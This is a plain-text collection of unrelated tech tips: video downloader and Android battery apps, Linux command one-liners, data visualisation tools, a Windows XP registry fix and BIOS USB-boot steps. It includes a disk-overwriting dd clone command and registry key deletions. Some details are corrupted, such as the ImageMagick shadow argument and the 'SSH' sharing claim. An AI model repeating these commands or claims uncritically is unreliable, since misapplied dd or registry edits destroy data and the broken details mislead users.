iSkysoft Free Video Downloader: It is available on the Mac and on Windows. While
there is a free version available, the premium version is not very expensive ei
ther. You can download it in order to download videos from YouTube.
YTD Video Downloader: This is the advanced version of YouTube Downloaded. It off
ers better speeds for video downloads and conversion along with resume download
capacity.
ATube Catcher: This free tool is available for users to download videos from dif
ferent websites. It can also created audio CDs, mp3s, ringtones and GIFs. It is
smooth and easy to use.
YouTuber: This is an easy-to-use and popular software for downloading and conver
ting videos from YouTube. It is available in both freeware and premium versions.
All Video Downloader: This software also allows you to download videos from YouT
ube and then convert them into various formats. It is available for free and is
one of the most popular amongst freeware.
Free YouTube Download: This tool can not only allow you to download single video
s from YouTube, it can also download playlists. You can use your viewing history
to download all the videos of a website or user.
Browser Based Downloader
KEEPVID Downloader: This is a browser-based downloader that allows users to down
load easily by adding the link of the video in the download box
Firefox Addon
Download YouTube Videos as MP4: As the name suggests, this browser-based tool al
lows you to download the videos in the mp4 format. It is quite easy-to-use.
Apps:
YouTube Downloader Plus RT: This is an app for Microsofts Windows Phone 8 operati
ng system. It allows users to extract the audio from an app and then create mp3
files.
YouTube Downloader For Android: This is an app for Android that not only allows
downloading of videos, but also allows them to be shared using SSH. Also, you ca
n extract mp3 from a video.
YouTube To Mp3 Converter: Take any video from YouTube and convert it to the mp3
format. This app works on Windows, Linux, Mac and even the iOS for iPhones.
________________________________________________________________________________
________________________________________________________________________________
________________
One of the biggest strengths of the Android OS though is in its third party apps
, and through these apps, you can even improve your battery life.
So, here are a few apps thatll help you do that.
Wakelock Detector : This is more of an analytical app and is useful for people w
ho really understand the Android system, like developers.
This app detects Wakelocks on your system. This is an Android feature that lets
apps keep the CPU awake and doesnt let it go to sleep. The Detector finds which a
pps are using Wakelocks and lets you know.
Battery Doctor : This app is better suited for amateur users. It analyzes your s
ystem and tells you what apps you should turn off in order to optimise your batt
ery life.
Tasker : This app is a scheduling application in a way.
It lets you manage your phone and automate different programs and components to
run and not run based on the time and location.
JuiceDefender : This is a power manager app that lets you extend the battery lif
e of your device.
The basic version of this app is available for free, but it also has paid versio
n at $1.99 and $4.99.
Go Battery Saver : As the name suggests, this is also a battery saving app. It s
hows you which apps are taking the most power in your phone and gives you person
alised control over your device. It has a free version and the paid full version
comes at $4.99.
Battery Defender : This is one of the simplest battery saving applications for t
he Android system. One of the best parts about it is that it is available for fr
ee.
Battery Drain Analyzer : This app computes the percentage per hour usage of your
battery.
You can get this app for free or buy the pro version for $2.19.
ES Task Manager (Task Killer) : With over 10 million downloads, this app is one
of the best known in the Android market.
If you use this app alongside other battery managing apps, then the information
you gathered from them can be used effectively using this
________________________________________________________________________________
________________________________________________________________________________
___________
1. Image resizing: Use software like Photoshop and GIMP only when youre doing som
ething to the image, like cropping etc. Otherwise, you can use a single command
for resizing images. It saves you a lot of time.
convert -resize 300 image.jpg image-small.jpg
2. Drop Shadow: There is again a command for this. Adding a drop shadow doesnt al
ways need a graphical user interface to be working alongside it. In order to use
the command, you must install Imagemagick on the system. On Debian and Ubuntu,
this can be done using the apt-get install imagemagick command.
convert screenshot.jpg \( +clone -background black -shadow 605+0+5 \) +swap -back
ground white -layers merge +repage shadow.jpg
3. Splice mp3 files: Use the cat command to splice two mp3 files together.
cat 1.mp3 2.mp3 > combined.mp3
4. Cloning Hard Drives: Rather than using a GUI, you can use DD, which is amongs
t the most powerful and simple image applications.
dd if=/dev/hda of=/dev/hdb
5. Burning an ISO image to a CD: CD Burning software is good, but they have a lo
t of steps and take time. Use the following command instead. It is a big one, so
use an alias instead.
cdrecord -v speed=8 dev=0,0,0 name_of_iso_file.iso
Note: In order to find the information for the dev = but, you can use the cdrecord s
canbus command.
6. Video Conversions: If you want to convert an AVI file into an MPEG file, then
use the ffmpeg command.
ffmpeg -i video_original.avi video_finale.mpg
Same can be done for MPEG to AVI.
7. Replacing words in a text file: Use the sed command for this.
sed s/#FF0000/#0000FF/g main.css
________________________________________________________________________________
________________________________________________________________________________
_____________
1.OpenRefine
OpenRefine (formerly Google Refine) is a powerful tool for working with messy da
ta: cleaning it; transforming it from one format into another;
extending it with web services; and linking it to databases like Freebase.
2.R Project for Statistical Computing
R is a language and environment for statistical computing and graphics. It is a
GNU project which is similar to the S language and environment.
R provides a wide variety of statistical (linear and nonlinear modelling, class
ical statistical tests, time-series analysis, classification, clustering) and
graphical techniques, and is highly extensible.
3.Google Fusion Tables
Fusion Tables is an experimental data visualisation web application to gather, v
isualise, and share data tables.
4.Exhibit
Exhibit lets you easily create web pages with advanced text search and filtering
functionalities, with interactive maps, timelines,
and other visualisations like these
5.JavaScript InfoVis Toolkit
The JavaScript InfoVis Toolkit provides tools for creating Interactive Data Visu
alisations for the Web.
6.Protovis
Protovis composes custom views of data with simple marks such as bars and dots.
Unlike low-level graphics libraries that quickly become tedious for visualisatio
n,
Protovis defines marks through dynamic properties that encode data, allowing inh
eritance, scales and layouts to simplify construction.
7.OpenLayers
OpenLayers makes it easy to put a dynamic map in any web page. It can display ma
p tiles and markers loaded from any source.
OpenLayers has been developed to further the use of geographic information of al
l kinds.
8.Gephi
Gephi is an interactive visualisation and exploration platform for all kinds of
networks and complex systems, dynamic and hierarchical graphs.
________________________________________________________________________________
________________________________________________________________________________
______________________________
I swear this info. helps to resolve this problem for Windows XP. I had this prob
lem and tried this -- it works!
1. Close all open programs
2. Click on Start, Run, and type REGEDIT and press Enter
3. Click on the plus signs (+) next to the following folders:
HKEY_LOCAL_MACHINE
SYSTEM
CurrentControlSet
Control
Class
{4D36E965-E325-11CE-BFC1-08002BE10318}
4. This folder is the DVD/CD-ROM Drive Class Description in the registry. Look f
or any of the following names in the right hand column.
UpperFilters
LowerFilters
UpperFilters.bak
LowerFilters.bak
5. If any of the above keys shown in step 4 are listed, right-click on them and
choose Delete
6. After deleting the keys, close the Registry Editor
7. Reboot your computer
8. Open My Computer and check to see if your CD or DVD drives have returned. You
may also want to open Device Manager and verify that the yellow exclamation and
error code on the CD or DVD drive is gone. Also, be sure to check under Compute
r to make sure the CD/DVD drive is visible.
I m sure following these steps will work for you as they did for me.
________________________________________________________________________________
________________________________________________________________________________
_____
1
Plug in the flash drive. Make sure that it is plugged into the computer itself a
nd not through a USB hub.
2
Turn on the computer. Every computer manufacturer has a different boot screen. A
s soon as you see the logo, you will need to hit either F2, F10,
or Del to enter the BIOS menu. These are the most common keys for entering the B
IOS menu. The key you need to press will be displayed under the logo.
This part of the boot process can occur quickly, and you may have to restart
the computer if you missed the chance to enter BIOS.
3
Find the Boot menu. If you hit the correct key at the correct time, you should n
ow be in the BIOS menu for the computer.
This is where basic computer functions are set, before an OS (Operating System)
is loaded. Navigate to the Boot menu. Every manufacturer has a different BIOS s
etup.
Some have the menu in a column; others have tabs across the top. Heres an exampl
e BIOS:
4
Change the boot order. Once you are in the Boot menu, you will see a list of dev
ices.
This is the order of devices that the computer will attempt to find an OS on. Ty
pically, the first device listed is the computers hard drive,
usually followed by the CD/DVD drive.
Select the first boot device and change it to your flash drive.
The menu will either say Removable Device or will display your flash drives model n
ame.
This will make the computer check your flash drive first after turning on, inste
ad of the hard drive.
5
Save and exit. Navigate to the Exit menu in the BIOS. Select Exit and Save Change
s.
Alternatively, many BIOS have a shortcut key displayed at the bottom that will
save and exit with one keystroke.
Saving and exiting reboots your computer.
6
Wait for your flash drive to load automatically after the reboot. After a few se
conds, depending on what your flash drive is made for, you will be given control
.
If you made an MS-DOS flash drive, you will be given a command prompt after boot
ing. If you made a Windows 7 install flash drive,
the install process will begin automatically.
________________________________________________________________________________
_______________________________________________________________________________